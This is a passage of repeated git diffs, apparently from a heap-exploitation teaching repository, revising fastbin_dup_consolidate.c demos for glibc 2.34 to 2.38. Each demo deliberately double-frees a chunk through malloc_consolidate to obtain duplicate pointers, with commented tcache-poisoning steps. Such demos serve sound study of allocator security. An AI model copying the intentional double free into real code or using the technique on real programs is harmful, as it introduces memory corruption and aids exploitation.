-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.34/fastbin_dup_consolidate.c
+++ b/glibc_2.34/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.35/fastbin_dup_consolidate.c
+++ b/glibc_2.35/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.35/fastbin_dup_consolidate.c
+++ b/glibc_2.35/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.36/fastbin_dup_consolidate.c
+++ b/glibc_2.36/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.36/fastbin_dup_consolidate.c
+++ b/glibc_2.36/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.37/fastbin_dup_consolidate.c
+++ b/glibc_2.37/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.37/fastbin_dup_consolidate.c
+++ b/glibc_2.37/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.38/fastbin_dup_consolidate.c
+++ b/glibc_2.38/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.38/fastbin_dup_consolidate.c
+++ b/glibc_2.38/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
